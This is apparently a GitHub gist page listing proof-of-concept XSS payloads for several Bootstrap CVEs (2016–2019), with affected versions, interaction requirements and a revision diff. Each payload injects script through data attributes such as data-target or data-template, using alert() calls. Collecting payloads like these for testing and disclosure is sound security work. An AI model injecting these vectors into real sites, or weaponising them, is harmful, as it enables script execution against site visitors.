Skip to content

Instantly share code, notes, and snippets.

@dokkillo

dokkillo/Bootstrap_XSS.md

Forked from BlackFan/Bootstrap_XSS.md
Created April 13, 2021 13:03
Show Gist options
  • Save dokkillo/aa1f521619e3d38b220c8d090ad16b2a to your computer and use it in GitHub Desktop.
Save dokkillo/aa1f521619e3d38b220c8d090ad16b2a to your computer and use it in GitHub Desktop.
Download ZIP

Revisions

  1. @BlackFan BlackFan revised this gist Dec 11, 2019. 1 changed file with 1 addition and 1 deletion.
    2 changes: 1 addition & 1 deletion Bootstrap_XSS.md
    View file
    Original file line number Diff line number Diff line change
    @@ -75,7 +75,7 @@ Bootstrap < 3.4.0 || v4.0.0-beta
    :heavy_minus_sign: Requires user interaction

    ```
    <x href="<img src=x onerror=alert(0)>" data-dismiss="alert">Test</x>
    <x href="<img src=x onerror=alert(0)>" data-dismiss="alert">XSS</x>
    <x data-toggle="collapse" data-target="<img src=x onerror=alert(1)>">XSS</x>
    <x data-toggle="modal" data-target="<img src=x onerror=alert(2)>">XSS</x>
    <x data-slide-to="0" data-target="<img src=x onerror=alert(3)>">XSS</x>
  2. @BlackFan BlackFan created this gist Dec 11, 2019.
    83 changes: 83 additions & 0 deletions Bootstrap_XSS.md
    View file
    Original file line number Diff line number Diff line change
    @@ -0,0 +1,83 @@
    CVE-2019-8331
    =====
    Bootstrap < 3.4.1 || < 4.3.1

    :heavy_check_mark: CSP strict-dynamic bypass

    :heavy_minus_sign: Requires user interaction

    :heavy_minus_sign: Requires $('[data-toggle="tooltip"]').tooltip();

    ```
    <x data-toggle="tooltip" data-template="<img src=x onerror=alert(1)>">XSS</x>
    <x data-toggle="tooltip" data-html="true" title='<script>alert(1)</script>'>XSS</x>
    <x data-toggle="tooltip" data-html="true" data-content='<script>alert(1)</script>'>XSS</x>
    ```

    CVE-2018-20677
    =====
    Bootstrap < 3.4.0

    :heavy_check_mark: Without user interaction

    ```
    <x data-spy="affix" data-target="<img src=x onerror=alert(1)>">
    ```

    CVE-2018-20676
    =====
    Bootstrap < 3.4.0

    :heavy_check_mark: Without user interaction

    :heavy_minus_sign: Requires $('[data-toggle="tooltip"]').tooltip();

    ```
    <x data-toggle="tooltip" data-viewport="<img src=x onerror=alert(1) />">XSS</x>
    ```

    CVE-2018-14040
    =====
    Bootstrap < 3.4.0 || < 4.1.2

    :heavy_minus_sign: Requires user interaction

    ```
    <a id="x" data-toggle="collapse" href="#x" data-parent="<img src=x onerror=alert(1) />">XSS</a>
    ```

    CVE-2018-14041
    =====
    Bootstrap < 3.4.0 || < 4.1.2

    :heavy_check_mark: Without user interaction

    ```
    <x data-spy="scroll" data-target="<img src=x onerror=alert(1) />">XSS</x>
    ```

    CVE-2018-14042
    =====
    Bootstrap < 3.4.0 || < 4.1.2

    :heavy_minus_sign: Requires user interaction

    :heavy_minus_sign: Requires $('[data-toggle="tooltip"]').tooltip();

    ```
    <x data-toggle="tooltip" data-container="<img src=x onerror=alert(1) />" title="x">XSS</x>
    ```

    CVE-2016-10735
    =====
    Bootstrap < 3.4.0 || v4.0.0-beta

    :heavy_minus_sign: Requires user interaction

    ```
    <x href="<img src=x onerror=alert(0)>" data-dismiss="alert">Test</x>
    <x data-toggle="collapse" data-target="<img src=x onerror=alert(1)>">XSS</x>
    <x data-toggle="modal" data-target="<img src=x onerror=alert(2)>">XSS</x>
    <x data-slide-to="0" data-target="<img src=x onerror=alert(3)>">XSS</x>
    etc
    ```